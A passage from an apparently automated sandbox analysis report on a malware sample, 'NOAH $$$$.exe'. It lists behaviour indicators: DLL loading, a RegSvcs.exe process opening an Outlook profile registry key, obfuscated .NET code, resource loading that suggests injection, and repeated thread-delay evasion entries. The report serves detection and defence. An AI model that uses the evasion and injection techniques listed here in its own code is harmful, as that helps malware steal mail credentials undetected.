              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: NOAH $$$$.exeStatic file information: File size 1221899 > 1048576
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: NOAH $$$$.exe, 00000000.00000003.2021564875.0000000004200000.00000004.00001000.00020000.00000000.sdmp, NOAH $$$$.exe, 00000000.00000003.2027336930.00000000043A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: NOAH $$$$.exe, 00000000.00000003.2021564875.0000000004200000.00000004.00001000.00020000.00000000.sdmp, NOAH $$$$.exe, 00000000.00000003.2027336930.00000000043A0000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: NOAH $$$$.exeStatic PE information: real checksum: 0xa961f should be: 0x138c47
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_025537C0 push eax; ret 2_2_025537EA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_025537F0 push eax; ret 2_2_025537FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02553780 push eax; ret 2_2_025537FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02553780 push eax; ret 2_2_0255380A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02553800 push eax; ret 2_2_0255380A
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'lnFZ4XouZHeNj', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'lnFZ4XouZHeNj', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'lnFZ4XouZHeNj', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\NOAH $$$$.exeAPI/Special instruction interceptor: Address: 3FCD34C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599543Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599436Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598550Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598201Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596931Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596763Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596653Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594053Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593935Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593822Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2261Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7568Jump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87661
              Source: C:\Users\user\Desktop\NOAH $$$$.exeAPI coverage: 3.6 %
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599543Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599436Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598550Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598201Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596931Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596763Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596653Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
